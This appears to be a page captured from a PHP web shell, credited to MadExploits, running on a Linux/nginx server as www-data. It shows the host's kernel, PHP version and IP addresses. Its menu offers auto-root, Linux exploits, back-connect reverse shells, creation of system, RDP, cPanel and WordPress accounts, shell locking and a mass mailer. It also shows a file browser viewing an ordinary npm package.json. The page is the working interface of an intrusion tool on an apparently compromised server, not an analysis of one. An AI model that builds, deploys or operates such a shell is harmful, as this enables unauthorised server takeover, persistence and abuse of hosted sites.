Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
quiz1 /
node_modules /
es-module-lexer /
[ HOME SHELL ]
Name
Size
Permission
Action
dist
[ DIR ]
dr-xr-xr-x
types
[ DIR ]
dr-xr-xr-x
LICENSE
1.07
KB
-rw-rw-rw-
README.md
9.81
KB
-rw-rw-rw-
lexer.js
25.69
KB
-rw-rw-rw-
package.json
1.37
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "es-module-lexer", "version": "1.5.4", "description": "Lexes ES modules returning their import/export metadata", "main": "dist/lexer.cjs", "module": "dist/lexer.js", "types": "types/lexer.d.ts", "exports": { ".": { "types": "./types/lexer.d.ts", "module": "./dist/lexer.js", "import": "./dist/lexer.js", "require": "./dist/lexer.cjs" }, "./js": "./dist/lexer.asm.js" }, "scripts": { "build": "npm install -g chomp ; chomp build", "test": "npm install -g chomp ; chomp test" }, "author": "Guy Bedford", "license": "MIT", "devDependencies": { "@babel/cli": "^7.5.5", "@babel/core": "^7.5.5", "@babel/plugin-transform-modules-commonjs": "^7.5.0", "@swc/cli": "^0.1.57", "@swc/core": "^1.2.224", "@types/node": "^18.7.1", "kleur": "^2.0.2", "mocha": "^5.2.0", "terser": "^5.19.4", "typescript": "^4.7.4" }, "files": [ "dist", "types", "lexer.js" ], "type": "module", "repository": { "type": "git", "url": "git+https://github.com/guybedford/es-module-lexer.git" }, "bugs": { "url": "https://github.com/guybedford/es-module-lexer/issues" }, "homepage": "https://github.com/guybedford/es-module-lexer#readme", "directories": { "lib": "lib", "test": "test" }, "keywords": [] }
Close